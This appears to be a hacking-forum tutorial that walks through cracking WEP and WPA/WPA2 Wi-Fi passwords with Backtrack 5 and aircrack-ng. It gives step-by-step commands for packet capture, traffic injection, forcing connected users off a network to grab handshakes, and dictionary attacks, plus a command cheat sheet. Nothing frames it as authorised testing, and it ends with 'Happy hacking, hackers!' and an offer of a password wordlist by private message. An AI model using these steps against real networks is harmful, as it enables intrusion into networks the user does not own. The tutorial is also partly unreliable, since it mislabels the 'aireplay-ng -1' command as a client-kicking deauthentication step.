  • WEP encrypted networks
  • WPA/WPA2 encrypted networks
  • Commands Used






[Image: hPqWA.jpg]
    This is the most vital step that you need to succeed in before learning how to use backtrack and actually hack WEP/WPA networks. Please follow the easy steps below:
[Image: hLpNX.jpg]
    • Download & Run UNetbootin
    • Tick Diskimage instead of Distribution
    • Select USB Drive as the type, and select your USB drive name - Example: F:\
    • Click OK and wait a couple of minutes - Note: It may freeze at some point, don't worry about that






[Image: T1lHe.jpg]
    What you need for this crack are a few simple things, a copy of backtrack 5 booting off a DVD or a flash drive and a compatible wireless card that supports packet injection. Now if you can't get to this screen, and you are stuck at the terminal you get when booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show. Okay so let's begin, so first we need to open a terminal. To do that, just click the little icon that's on the right side from System. Please see the image below:

    [Image: eYmZR.jpg?2367]

    Now type airmon-ng and that command displays our interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

    [Image: KjZHU.jpg]

    Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

    [Image: WNi8O.jpg]

    Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the network you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.

    [Image: n3XFy.jpg]

    Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let's preform one of the aireplay commands that will boost that data. Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your wi-fi card is supported, you should see Association successful :-), if you don't see that then your card is not supported.

    [Image: GknZt.jpg]

    Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

    [Image: I3GcE.jpg]

    Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap.

    [Image: 7Dno8.jpg]

    And now it will attempt to crack the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X's will be random numbers and/or letters. That's not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659. Just log in to your Windows OS, and connect using that password.





[Image: p79vw.jpg]
    So lets begin. What you will need for this crack is a dictionary file that we are going to use to crack the WPA/WPA2 password. Remember, the bigger the dictionary file is the greater the chance you have in cracking the password. So now you are probably wondering, where do I get a dictionary file? Well, I don't know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.

    To get the file please PM me, I can't risk getting this tutorial taken down. Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.


    [Image: KjZHU.jpg]

    Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for Wi-Fi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I'm going to attempt to crack the network under the essid SKIDHАCKER. Take a note of the channel, and you want to copy the BSSID for later use.

    [Image: 5KSfa.jpg]

    Now we are going to type in airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don't forget to remember what filename you chose, because we are going to need that at the end.

    [Image: 7jSkY.jpg]

    What is needed to crack a WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake. This means, if there is no one on the network, you can't get a handshake, and you can't crack the WPA network. So how do we know if someone is connected? Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.

    [Image: zoOBy.jpg]

    Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp. Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don't run the aireplay command a couple of times.

    [Image: 3UU1B.jpg]

    So now that we have a wpa handshake file, we are going to attempt to crack it. Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it's directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.

    [Image: rpUMB.jpg]

    If the password is in the wordlist, it will give you a success message and the key in brackets. Happy hacking, hackers!




[Image: Zphi1.jpg]
  • airmon-ng
      This command displays the wireless interfaces.
  • airmon-ng start wlan0
      This command starts monitoring mode on a wi-fi device.
  • airodump-ng mon0
      This command shows all of the wi-fi networks online.
  • airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
      This command specifies the wi-fi device to concentrate to one network.
  • aireplay-ng -1 0 -a (bssid) mon0
      This command kicks off clients that are connected, and gets the handshake.
  • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
      This command boosts the data, when cracking WEP.
  • aircrack-ng -w (dictionary) (wpa handshake)
      This command is used when cracking WPA or WPA2 networks.
  • aircrack-ng (filename)*.cap
      This command is used when cracking WEP networks.
Read More
CEX.io